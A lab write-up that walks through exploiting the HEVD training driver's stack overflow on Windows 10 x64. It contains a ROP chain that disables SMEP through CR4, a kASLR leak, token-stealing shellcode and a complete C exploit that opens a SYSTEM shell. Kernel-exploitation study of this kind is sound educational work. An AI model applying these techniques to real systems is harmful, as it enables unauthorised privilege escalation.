Windows 10 x64 Kernel Exploitation - Stack Buffer Overflow using HEVD
Setup
This has been repeated 100 times, so I'm keeping it brief. The debuggee and debugger are Windows 10 x64 fully up to date (OS Build 19045.5371). I used the following commands to setup the debuggee virtual machine. The debugger VM I installed WinDbg, Visual Studio, and Binary Ninja.
bcdedit -set TESTSIGNING on
bcdedit /debug on
bcdedit /dbgsettings net hostip:<HOST IP ADDR HERE> port:50000
sc create HEVD binPath= C:\driver\vulnerable\x64\HEVD.sys type= kernel
sc config HEVD start= auto
sc start HEVD
sc query HEVD
sc stop HEVD
sc delete HEVD
Trigger the Exploit and Gain RIP Control
I triggered the buffer overlow with a cyclic pattern to easily identify the offset for RIP
control.
int main(void) {
HANDLE hDriver = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
char payload[] = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3....De8De9Df0Df1Df2D"
DeviceIoControl(
hDriver,
HEVD_IOCTL_BUFFER_OVERFLOW_STACK,
payload,
sizeof(payload),
NULL,
0,
NULL,
NULL);
return 0;
}
After the crash, we can use WinDbg to inspect the stack (dq rsp
), and find the value we tried to ret
to. And then lookup up the pattern to find the offset for rip
control.
Time to ROP
Because of DEP, and SMEP our only option is to ROP (althought I believe CET/shadow stack if enabled and supported by the kernel would stop ROP).
DEP - The easiest solution is to allocate an executable page in userland for our shellcode.
SMEP - Disable SMEP by flipping the 20th bit in the CR4 register. This disables SMEP system wide, and will let us execute userland pages from the kernel. (Note that with virtualization-based Security (VBS) CR4 would be protected)
I used https://github.com/Ben-Lichtman/ropr to find some gadgets to disable SMEP by modifying the CR4 register. Note the addresses given by ropr (and tools like Binary Ninja) include the 0x140000000 image base which needs to be subtracted.
u64 POP_RCX = kernelBase + 0x9b2952; // pop rcx; ret;
u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;
Also note, you cannot pick gadgets within any sections of the PE file marked as DISCARDABLE. These sections will be scrambled after initialization is complete.
Also note I hardcoded a value to write into cr4
. It would be more idea to read it first, but I couldn't find any gadgets to do this ☹. Regardless the best approach is to flip the Owner
bit in the PTE as this bypass works with VBS enabled. See https://wetw0rk.github.io/posts/0x04-writing-what-where-in-the-kernel/#windows-11-x64 for a good example.
Because these gadgets are within the kernel (C:\Windows\System32\ntoskrnl.exe), we need to break kASLR. Lucky we are on Windows 10 running in medium integrity and there are many Win32 APIs to do so. On Windows 11 24H2 this requires a kernel memory leak.
PVOID GetKernelBaseAddress() {
LPVOID drivers[1024] = { 0 };
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return drivers[0];
}
The kernel base address can be confimred by running lm sm *nt*
in WinDbg.
The new code is:
int main(void) {
u8 token_steal[256] = { 0x90 }; // NOPs
u64 kernelBase = (u64)GetKernelBaseAddress();
u64 POP_RCX = kernelBase + 0x9b2952; // pop rcx; ret;
u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;
HANDLE hDriver = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver", // lpFileName
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
const u64 offset = 2072;
const u64 payloadSize = 2500;
const u64 shellcodeSize = 4096;
LPVOID payload = VirtualAlloc(NULL, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
LPVOID shellcode = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memset(payload, '\x41', payloadSize);
memcpy(shellcode, token_steal, sizeof(token_steal));
u64* rop = (u64*)((u64)payload + offset);
u64 index = 0;
*(rop + index++) = POP_RCX;
*(rop + index++) = 0xb50ef8 ^ 1UL << 20; // hardcoded value of CR4
*(rop + index++) = MOV_CR4_RCX;
*(rop + index++) = (u64)shellcode;
DeviceIoControl(
hDriver,
HEVD_IOCTL_BUFFER_OVERFLOW_STACK,
payload,
(DWORD)payloadSize,
NULL,
0,
NULL,
NULL);
return 0;
}
Running this we seen the ROP chain execute, disable SMEP, and ret
into the shellcode which is currently just NOPs.
Token Stealing Shellcode
I stole all this from https://vuln.dev/windows-kernel-exploitation-hevd-x64-stackoverflow/ but double checked the offsets in Windbg. It's a token stealing shellcode combined with a generic way return from the DeviceIoControl
syscall without crashing. This was assembled using NASM.
[BITS 64]
start:
mov rax, [gs:0x188] ; KPCRB.CurrentThread (_KTHREAD)
mov rax, [rax + 0xb8] ; APCState.Process (current _EPROCESS)
; dt nt!_KTHREAD ApcStateFill + dt nt!_KAPC_STATE Process
mov r8, rax ; Store current _EPROCESS ptr in RBX
loop:
mov r8, [r8 + 0x448] ; ActiveProcessLinks (dt _EPROCESS ActiveProcessLinks)
sub r8, 0x448 ; Go back to start of _EPROCESS (same offset as above)
mov r9, [r8 + 0x440] ; UniqueProcessId (PID) (dt _EPROCESS UniqueProcessId)
cmp r9, 4 ; SYSTEM PID?
jnz loop ; Loop until PID == 4
replace:
mov r9, [r8 + 0x4b8] ; Get SYSTEM token (dt _EPROCESS Token)
and r9, 0xf0 ; Clear low 4 bits of _EX_FAST_REF structure
mov [rax + 0x4b8], r9 ; Copy SYSTEM token to current process (dt _EPROCESS Token)
xor rax, rax
ret
The full exploit code
#include <Windows.h>
#include <Psapi.h>
#include <stdio.h>
typedef signed char i8;
typedef short i16;
typedef int i32;
typedef long long i64;
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
#define ArraySize(x) (sizeof x / sizeof x[0])
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_BUFFER_OVERFLOW_STACK IOCTL(0x800)
PVOID GetKernelBaseAddress() {
LPVOID drivers[1024] = { 0 };
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return drivers[0];
}
int main(void) {
u8 token_steal[] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04,
0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b,
0x88, 0xb8, 0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89,
0x88, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00,
0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01,
0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 0x07 };
u64 kernelBase = (u64)GetKernelBaseAddress();
if (kernelBase == 0x00) return 1;
const u64 POP_RCX = kernelBase + 0x9b2952; // pop rcx; ret;
const u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;
HANDLE hDriver = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hDriver == INVALID_HANDLE_VALUE) return 1;
const u64 offset = 2072;
const u64 payloadSize = 2500;
const u64 shellcodeSize = 4096;
LPVOID payload = VirtualAlloc(NULL, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
LPVOID shellcode = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!payload || !shellcode) return 1;
memset(payload, '\x41', payloadSize);
memcpy(shellcode, token_steal, sizeof(token_steal));
u64* rop = (u64*)((u64)payload + offset);
//*(u64*)((u64)payload + offset) = (u64)shellcode;
u64 index = 0;
*(rop + index++) = POP_RCX;
*(rop + index++) = 0xb50ef8 ^ 1UL << 20;
*(rop + index++) = MOV_CR4_RCX;
*(rop + index++) = (u64)shellcode;
DeviceIoControl(
hDriver,
HEVD_IOCTL_BUFFER_OVERFLOW_STACK,
payload,
(DWORD)payloadSize,
NULL,
0,
NULL,
NULL);
system("cmd");
return 0;
}